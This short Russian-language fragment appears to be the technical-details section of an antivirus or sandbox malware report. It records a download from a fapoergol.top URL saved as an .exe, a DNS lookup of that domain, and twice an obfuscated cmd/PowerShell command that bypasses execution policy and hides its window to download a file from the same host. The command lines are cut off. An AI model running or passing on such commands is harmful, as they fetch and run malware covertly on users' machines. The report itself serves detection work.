Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^WER^sHElL.^eX^e -^E^XECU^t^IO^n^POL^icY ^BYPASS -^nopRofI^lE -W^IN^Do^WS^Ty^le ^hIdD^EN (NE^W-OB^JEC^T s^Y^sTEm^.N^E^T.we^Bc^L^IE^Nt^).^dowNLO^adF^i^L^e('http://www.fapoerg...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "PO^WER^sHElL.^eX^e -^E^XECU^t^IO^n^POL^icY ^BYPASS -^nopRofI^lE -W^IN^Do^WS^Ty^le ^hIdD^EN (NE^W-OB^JEC^T s^Y^sTEm^.N^E^T.we^Bc^L^IE^Nt^).^dowNLO^adF^i^L^e('http://www.fapoerg...' (со скрытым окном)